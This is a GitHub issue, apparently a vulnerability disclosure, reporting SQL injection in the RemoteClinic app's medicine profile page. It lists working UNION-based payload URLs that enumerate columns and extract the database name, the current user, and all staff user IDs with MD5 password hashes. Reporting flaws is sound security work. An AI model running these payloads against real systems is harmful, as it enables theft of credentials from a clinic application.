Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection in /medicines/profile.php via id parameter #20

Open
Saud-Ahmad opened this issue Dec 26, 2022 · 1 comment
Open

SQL Injection in /medicines/profile.php via id parameter #20

Saud-Ahmad opened this issue Dec 26, 2022 · 1 comment

Comments

@Saud-Ahmad
Copy link

Vulnerability Description:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.

Vulnerable Endpoint: http://localhost/RemoteClinic/medicines/profile.php?id=30 (My Medicine Profile ID is 30)

Steps to Reproduce:

  1. Login in Application as Doctor.
  2. Click on Directory.

Click on Directory

  1. Click on any medicine profile.

Click on any medicine profile

  1. Now PUT single quote in medicine profile endpoint.

single quote

  1. Balance the Query to Remove Errors.

    Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=30%27--%20-

Balance

  1. Find Total Numbers of Columns.

    Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=30%27%20order%20by%207--%20-

Total Columns

  1. Find Vulnerable Columns.

    Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%201,2,3,4,5,6,7--%20-

Vulnerable Columns

  1. Now Extract Current Database and Current User.

    Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20database(),user(),3,4,5,6,7--%20-

db and user

  1. Extract All Users and Passwords (md5 hash).

    Full URL: http://localhost/RemoteClinic/medicines/profile.php?id=-30%27%20union%20select%20group_concat(userid,0x3a,passkey,0x0a),2,3,4,5,6,7%20from%20p_staff_dir--%20-

users and passwords

Impact:

An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.

@Saud-Ahmad
Copy link
Author

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant